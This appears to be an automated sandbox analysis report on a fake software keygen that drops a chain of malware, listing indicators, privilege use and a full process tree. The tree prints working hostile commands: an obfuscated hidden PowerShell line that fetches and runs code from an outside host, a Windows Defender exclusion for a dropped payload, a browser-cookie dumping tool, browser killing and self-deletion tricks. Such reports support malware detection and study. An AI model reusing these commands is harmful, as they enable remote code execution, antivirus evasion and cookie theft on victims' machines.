bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe -
Runs ping.exe 1 TTPs 6 IoCs
pid Process 5664 PING.EXE 7804 PING.EXE 6572 PING.EXE 1056 PING.EXE 2864 PING.EXE 6060 PING.EXE -
Script User-Agent 12 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 651 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 655 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 200 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 559 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 563 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 685 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 688 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 719 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 725 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 193 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 377 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 386 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 204 setups.tmp 204 setups.tmp 2680 multitimer.exe 2680 multitimer.exe 2680 multitimer.exe 2680 multitimer.exe 2680 multitimer.exe 2680 multitimer.exe 2680 multitimer.exe 2680 multitimer.exe 2680 multitimer.exe 2680 multitimer.exe 2680 multitimer.exe 2680 multitimer.exe 2680 multitimer.exe 2680 multitimer.exe 2680 multitimer.exe 2680 multitimer.exe 2680 multitimer.exe 2680 multitimer.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
description pid Process Token: SeDebugPrivilege 4364 Setup.exe Token: SeCreateTokenPrivilege 212 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 212 askinstall20.exe Token: SeLockMemoryPrivilege 212 askinstall20.exe Token: SeIncreaseQuotaPrivilege 212 askinstall20.exe Token: SeMachineAccountPrivilege 212 askinstall20.exe Token: SeTcbPrivilege 212 askinstall20.exe Token: SeSecurityPrivilege 212 askinstall20.exe Token: SeTakeOwnershipPrivilege 212 askinstall20.exe Token: SeLoadDriverPrivilege 212 askinstall20.exe Token: SeSystemProfilePrivilege 212 askinstall20.exe Token: SeSystemtimePrivilege 212 askinstall20.exe Token: SeProfSingleProcessPrivilege 212 askinstall20.exe Token: SeIncBasePriorityPrivilege 212 askinstall20.exe Token: SeCreatePagefilePrivilege 212 askinstall20.exe Token: SeCreatePermanentPrivilege 212 askinstall20.exe Token: SeBackupPrivilege 212 askinstall20.exe Token: SeRestorePrivilege 212 askinstall20.exe Token: SeShutdownPrivilege 212 askinstall20.exe Token: SeDebugPrivilege 212 askinstall20.exe Token: SeAuditPrivilege 212 askinstall20.exe Token: SeSystemEnvironmentPrivilege 212 askinstall20.exe Token: SeChangeNotifyPrivilege 212 askinstall20.exe Token: SeRemoteShutdownPrivilege 212 askinstall20.exe Token: SeUndockPrivilege 212 askinstall20.exe Token: SeSyncAgentPrivilege 212 askinstall20.exe Token: SeEnableDelegationPrivilege 212 askinstall20.exe Token: SeManageVolumePrivilege 212 askinstall20.exe Token: SeImpersonatePrivilege 212 askinstall20.exe Token: SeCreateGlobalPrivilege 212 askinstall20.exe Token: 31 212 askinstall20.exe Token: 32 212 askinstall20.exe Token: 33 212 askinstall20.exe Token: 34 212 askinstall20.exe Token: 35 212 askinstall20.exe Token: SeDebugPrivilege 2680 multitimer.exe Token: SeDebugPrivilege 3480 taskkill.exe Token: SeDebugPrivilege 4244 MicrosoftEdge.exe Token: SeDebugPrivilege 4244 MicrosoftEdge.exe Token: SeDebugPrivilege 4244 MicrosoftEdge.exe Token: SeDebugPrivilege 4244 MicrosoftEdge.exe Token: SeDebugPrivilege 824 AdvancedRun.exe Token: SeDebugPrivilege 824 AdvancedRun.exe Token: SeDebugPrivilege 824 AdvancedRun.exe Token: SeDebugPrivilege 824 AdvancedRun.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 4400 setups.exe 204 setups.tmp 4244 MicrosoftEdge.exe 4572 MicrosoftEdgeCP.exe 4572 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 53 IoCs
description pid Process procid_target PID 4772 wrote to memory of 3372 4772 Comprehensive_Meta_Analysis_keygen_by_KeygenNinja.exe 79 PID 4772 wrote to memory of 3372 4772 Comprehensive_Meta_Analysis_keygen_by_KeygenNinja.exe 79 PID 4772 wrote to memory of 3372 4772 Comprehensive_Meta_Analysis_keygen_by_KeygenNinja.exe 79 PID 3372 wrote to memory of 3452 3372 cmd.exe 82 PID 3372 wrote to memory of 3452 3372 cmd.exe 82 PID 3372 wrote to memory of 3452 3372 cmd.exe 82 PID 3372 wrote to memory of 1856 3372 cmd.exe 83 PID 3372 wrote to memory of 1856 3372 cmd.exe 83 PID 3372 wrote to memory of 1856 3372 cmd.exe 83 PID 3372 wrote to memory of 4496 3372 cmd.exe 84 PID 3372 wrote to memory of 4496 3372 cmd.exe 84 PID 3372 wrote to memory of 4496 3372 cmd.exe 84 PID 3372 wrote to memory of 4580 3372 cmd.exe 85 PID 3372 wrote to memory of 4580 3372 cmd.exe 85 PID 3372 wrote to memory of 4580 3372 cmd.exe 85 PID 4580 wrote to memory of 4364 4580 keygen-step-4.exe 86 PID 4580 wrote to memory of 4364 4580 keygen-step-4.exe 86 PID 3452 wrote to memory of 2128 3452 keygen-pr.exe 87 PID 3452 wrote to memory of 2128 3452 keygen-pr.exe 87 PID 3452 wrote to memory of 2128 3452 keygen-pr.exe 87 PID 4496 wrote to memory of 2572 4496 keygen-step-3.exe 88 PID 4496 wrote to memory of 2572 4496 keygen-step-3.exe 88 PID 4496 wrote to memory of 2572 4496 keygen-step-3.exe 88 PID 2572 wrote to memory of 2864 2572 cmd.exe 90 PID 2572 wrote to memory of 2864 2572 cmd.exe 90 PID 2572 wrote to memory of 2864 2572 cmd.exe 90 PID 2128 wrote to memory of 2696 2128 key.exe 91 PID 2128 wrote to memory of 2696 2128 key.exe 91 PID 2128 wrote to memory of 2696 2128 key.exe 91 PID 4364 wrote to memory of 2680 4364 Setup.exe 92 PID 4364 wrote to memory of 2680 4364 Setup.exe 92 PID 4364 wrote to memory of 4400 4364 Setup.exe 93 PID 4364 wrote to memory of 4400 4364 Setup.exe 93 PID 4364 wrote to memory of 4400 4364 Setup.exe 93 PID 4580 wrote to memory of 212 4580 keygen-step-4.exe 94 PID 4580 wrote to memory of 212 4580 keygen-step-4.exe 94 PID 4580 wrote to memory of 212 4580 keygen-step-4.exe 94 PID 4400 wrote to memory of 204 4400 setups.exe 95 PID 4400 wrote to memory of 204 4400 setups.exe 95 PID 4400 wrote to memory of 204 4400 setups.exe 95 PID 212 wrote to memory of 2268 212 askinstall20.exe 97 PID 212 wrote to memory of 2268 212 askinstall20.exe 97 PID 212 wrote to memory of 2268 212 askinstall20.exe 97 PID 2268 wrote to memory of 3480 2268 cmd.exe 99 PID 2268 wrote to memory of 3480 2268 cmd.exe 99 PID 2268 wrote to memory of 3480 2268 cmd.exe 99 PID 2680 wrote to memory of 1620 2680 multitimer.exe 105 PID 2680 wrote to memory of 1620 2680 multitimer.exe 105 PID 4580 wrote to memory of 4560 4580 keygen-step-4.exe 106 PID 4580 wrote to memory of 4560 4580 keygen-step-4.exe 106 PID 4580 wrote to memory of 4560 4580 keygen-step-4.exe 106 PID 1620 wrote to memory of 2132 1620 multitimer.exe 107 PID 1620 wrote to memory of 2132 1620 multitimer.exe 107
Processes
-
C:\Users\Admin\AppData\Local\Temp\Comprehensive_Meta_Analysis_keygen_by_KeygenNinja.exe"C:\Users\Admin\AppData\Local\Temp\Comprehensive_Meta_Analysis_keygen_by_KeygenNinja.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4772 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3372 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3452 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:2696
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:1856
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:2864
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4580 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4364 -
C:\Users\Admin\AppData\Local\Temp\PD0ECEPBIX\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\PD0ECEPBIX\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Users\Admin\AppData\Local\Temp\PD0ECEPBIX\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\PD0ECEPBIX\multitimer.exe" 1 3.1617536560.6069a630bf011 1016⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1620 -
C:\Users\Admin\AppData\Local\Temp\PD0ECEPBIX\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\PD0ECEPBIX\multitimer.exe" 2 3.1617536560.6069a630bf0117⤵
- Executes dropped EXE
PID:2132 -
C:\Users\Admin\AppData\Local\Temp\rwdpjofseny\aytewrvfd02.exe"C:\Users\Admin\AppData\Local\Temp\rwdpjofseny\aytewrvfd02.exe" /VERYSILENT8⤵PID:4128
-
C:\Users\Admin\AppData\Local\Temp\is-M6GBO.tmp\aytewrvfd02.tmp"C:\Users\Admin\AppData\Local\Temp\is-M6GBO.tmp\aytewrvfd02.tmp" /SL5="$8030C,2592217,780800,C:\Users\Admin\AppData\Local\Temp\rwdpjofseny\aytewrvfd02.exe" /VERYSILENT9⤵PID:4040
-
C:\Users\Admin\AppData\Local\Temp\is-AA5V5.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-AA5V5.tmp\winlthsth.exe"10⤵PID:5612
-
C:\Users\Admin\AppData\Local\Temp\fKiyVczZk.exe"C:\Users\Admin\AppData\Local\Temp\fKiyVczZk.exe"11⤵PID:6920
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:4600
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵PID:5428
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nhdflupek2j\1djnkcyy33a.exe"C:\Users\Admin\AppData\Local\Temp\nhdflupek2j\1djnkcyy33a.exe" /ustwo INSTALL8⤵PID:4324
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "1djnkcyy33a.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\nhdflupek2j\1djnkcyy33a.exe" & exit9⤵PID:636
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "1djnkcyy33a.exe" /f10⤵
- Kills process with taskkill
PID:6724
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\cluzpm2hcmc\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\cluzpm2hcmc\Setup3310.exe" /Verysilent /subid=5778⤵PID:2368
-
C:\Users\Admin\AppData\Local\Temp\is-021Q5.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-021Q5.tmp\Setup3310.tmp" /SL5="$10328,138429,56832,C:\Users\Admin\AppData\Local\Temp\cluzpm2hcmc\Setup3310.exe" /Verysilent /subid=5779⤵PID:5332
-
C:\Users\Admin\AppData\Local\Temp\is-LM6VV.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-LM6VV.tmp\Setup.exe" /Verysilent10⤵PID:4680
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"11⤵PID:6044
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:6592
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:6764
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"11⤵PID:2820
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 94812⤵
- Program crash
PID:5284
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 95212⤵
- Program crash
PID:4464
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 106012⤵
- Program crash
PID:7200
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 110012⤵
- Program crash
PID:6580
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 118012⤵
- Program crash
PID:8060
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 124412⤵
- Program crash
PID:8216
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 150412⤵
- Program crash
PID:8924
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 154012⤵
- Program crash
PID:9168
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 156812⤵
- Program crash
PID:6532
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 175612⤵
- Program crash
PID:8584
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 172812⤵
- Program crash
PID:5096
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 120812⤵
- Program crash
PID:8932
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"11⤵PID:2560
-
C:\Users\Admin\AppData\Local\Temp\is-3PGFC.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-3PGFC.tmp\LabPicV3.tmp" /SL5="$30342,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"12⤵PID:5224
-
C:\Users\Admin\AppData\Local\Temp\is-72BOM.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-72BOM.tmp\ppppppfy.exe" /S /UID=lab21413⤵PID:6408
-
C:\Program Files\Windows Defender\YHJYOTXQXQ\prolab.exe"C:\Program Files\Windows Defender\YHJYOTXQXQ\prolab.exe" /VERYSILENT14⤵PID:220
-
C:\Users\Admin\AppData\Local\Temp\is-CVJDO.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-CVJDO.tmp\prolab.tmp" /SL5="$A005C,575243,216576,C:\Program Files\Windows Defender\YHJYOTXQXQ\prolab.exe" /VERYSILENT15⤵PID:5892
-
-
-
C:\Users\Admin\AppData\Local\Temp\ff-39701-fc5-a62ba-b2f41709ca7a3\Jynyjywyzhae.exe"C:\Users\Admin\AppData\Local\Temp\ff-39701-fc5-a62ba-b2f41709ca7a3\Jynyjywyzhae.exe"14⤵PID:3268
-
-
C:\Users\Admin\AppData\Local\Temp\38-42076-6c7-3ca97-590863d880dc5\Putitufafy.exe"C:\Users\Admin\AppData\Local\Temp\38-42076-6c7-3ca97-590863d880dc5\Putitufafy.exe"14⤵PID:6368
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\beypgt2o.zfa\md6_6ydj.exe & exit15⤵PID:3428
-
C:\Users\Admin\AppData\Local\Temp\beypgt2o.zfa\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\beypgt2o.zfa\md6_6ydj.exe16⤵PID:6560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uevgswmx.53n\askinstall31.exe & exit15⤵PID:4460
-
C:\Users\Admin\AppData\Local\Temp\uevgswmx.53n\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\uevgswmx.53n\askinstall31.exe16⤵PID:7496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nhra1zoc.ou0\toolspab1.exe & exit15⤵PID:5948
-
C:\Users\Admin\AppData\Local\Temp\nhra1zoc.ou0\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\nhra1zoc.ou0\toolspab1.exe16⤵PID:7712
-
C:\Users\Admin\AppData\Local\Temp\nhra1zoc.ou0\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\nhra1zoc.ou0\toolspab1.exe17⤵PID:5260
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r4sk43vt.hmd\GcleanerWW.exe /mixone & exit15⤵PID:5688
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cc41kpzi.wro\setup_10.2_mix.exe & exit15⤵PID:7056
-
C:\Users\Admin\AppData\Local\Temp\cc41kpzi.wro\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\cc41kpzi.wro\setup_10.2_mix.exe16⤵PID:7360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ps3lxdes.mwo\file.exe & exit15⤵PID:5648
-
C:\Users\Admin\AppData\Local\Temp\ps3lxdes.mwo\file.exeC:\Users\Admin\AppData\Local\Temp\ps3lxdes.mwo\file.exe16⤵PID:6704
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"17⤵PID:6884
-
C:\Users\Admin\AppData\Local\Temp\9BHDUILQAH\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\9BHDUILQAH\multitimer.exe" 0 3060197d33d91c80.94013368 0 10118⤵PID:2600
-
C:\Users\Admin\AppData\Local\Temp\9BHDUILQAH\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\9BHDUILQAH\multitimer.exe" 1 3.1617536773.6069a70549864 10119⤵PID:7112
-
C:\Users\Admin\AppData\Local\Temp\9BHDUILQAH\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\9BHDUILQAH\multitimer.exe" 2 3.1617536773.6069a7054986420⤵PID:1404
-
C:\Users\Admin\AppData\Local\Temp\c3qfc43ddng\pmimo0dhvlq.exe"C:\Users\Admin\AppData\Local\Temp\c3qfc43ddng\pmimo0dhvlq.exe" /ustwo INSTALL21⤵PID:8604
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "pmimo0dhvlq.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\c3qfc43ddng\pmimo0dhvlq.exe" & exit22⤵PID:8304
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "pmimo0dhvlq.exe" /f23⤵
- Kills process with taskkill
PID:672
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\tybtit33zhm\app.exe"C:\Users\Admin\AppData\Local\Temp\tybtit33zhm\app.exe" /8-2321⤵PID:6884
-
-
C:\Users\Admin\AppData\Local\Temp\23ih1gmar30\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\23ih1gmar30\cpyrix.exe" /VERYSILENT21⤵PID:1376
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe22⤵PID:8212
-
C:\Users\Admin\AppData\Local\Temp\a550a3b1-9ecb-4f13-9c40-4de854f44734\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\a550a3b1-9ecb-4f13-9c40-4de854f44734\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\a550a3b1-9ecb-4f13-9c40-4de854f44734\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run23⤵
- Checks computer location settings
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:824 -
C:\Users\Admin\AppData\Local\Temp\a550a3b1-9ecb-4f13-9c40-4de854f44734\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\a550a3b1-9ecb-4f13-9c40-4de854f44734\AdvancedRun.exe" /SpecialRun 4101d8 82424⤵PID:7312
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force23⤵PID:7432
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 123⤵PID:1700
-
C:\Windows\SysWOW64\timeout.exetimeout 124⤵
- Delays execution with timeout.exe
PID:724
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"23⤵PID:6400
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8212 -s 106423⤵
- Program crash
PID:2744
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe22⤵PID:6116
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"23⤵PID:5548
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\onwzioqyvlv\vict.exe"C:\Users\Admin\AppData\Local\Temp\onwzioqyvlv\vict.exe" /VERYSILENT /id=53521⤵PID:4688
-
C:\Users\Admin\AppData\Local\Temp\is-SO2IN.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-SO2IN.tmp\vict.tmp" /SL5="$2061C,870426,780800,C:\Users\Admin\AppData\Local\Temp\onwzioqyvlv\vict.exe" /VERYSILENT /id=53522⤵PID:7340
-
C:\Users\Admin\AppData\Local\Temp\is-0E2RR.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-0E2RR.tmp\win1host.exe" 53523⤵PID:9052
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\k4ljhpv2enw\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\k4ljhpv2enw\Setup3310.exe" /Verysilent /subid=57721⤵PID:8972
-
C:\Users\Admin\AppData\Local\Temp\is-LO8H0.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-LO8H0.tmp\Setup3310.tmp" /SL5="$30692,138429,56832,C:\Users\Admin\AppData\Local\Temp\k4ljhpv2enw\Setup3310.exe" /Verysilent /subid=57722⤵PID:8892
-
C:\Users\Admin\AppData\Local\Temp\is-PJ92M.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-PJ92M.tmp\Setup.exe" /Verysilent23⤵PID:9124
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Q1I3W9FZVE\setups.exe"C:\Users\Admin\AppData\Local\Temp\Q1I3W9FZVE\setups.exe" ll18⤵PID:5408
-
C:\Users\Admin\AppData\Local\Temp\is-K5MHE.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-K5MHE.tmp\setups.tmp" /SL5="$70368,454998,229376,C:\Users\Admin\AppData\Local\Temp\Q1I3W9FZVE\setups.exe" ll19⤵PID:2284
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"17⤵PID:6948
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe18⤵PID:7576
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe19⤵
- Kills process with taskkill
PID:6864
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"17⤵PID:3960
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"18⤵PID:7336
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install19⤵PID:5288
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"17⤵PID:6328
-
C:\Users\Admin\AppData\Roaming\FAB4.tmp.exe"C:\Users\Admin\AppData\Roaming\FAB4.tmp.exe"18⤵PID:6976
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\FAB4.tmp.exe19⤵PID:1524
-
C:\Windows\SysWOW64\timeout.exetimeout /t 320⤵
- Delays execution with timeout.exe
PID:4080
-
-
-
-
C:\Users\Admin\AppData\Roaming\F767.tmp.exe"C:\Users\Admin\AppData\Roaming\F767.tmp.exe"18⤵PID:4892
-
